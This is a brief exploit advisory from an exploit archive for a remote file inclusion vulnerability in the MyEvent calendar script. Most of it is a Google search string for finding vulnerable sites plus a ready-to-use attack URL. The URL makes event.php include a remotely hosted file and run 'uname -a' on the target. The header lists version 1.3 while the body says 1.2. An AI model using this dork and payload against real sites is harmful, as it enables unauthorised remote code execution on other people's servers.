id: 365
date: 04/16/2006
title: MyEvent <= 1.3 (myevent_path) Remote File Inclusion Vulnerability
author: botan
cves: 

=================================================================
MyEvent <= 1.3 (myevent_path) Remote File Inclusion Vulnerability
=================================================================




Script : MyEvent
Version : 1.2
Risk : High
Class : Remote
Credits : b3g0k,Nistiman,flot,Netqurd etc.. my forget other friends
Google look for :) = "MyEvent 1.2 " or "/calendar/myevent.php" 

http://www.site.com/[path]/event.php?myevent_path=http://www.site.com/x.txt?&cmd=uname -a 



#  0day.today [2023-03-25]  #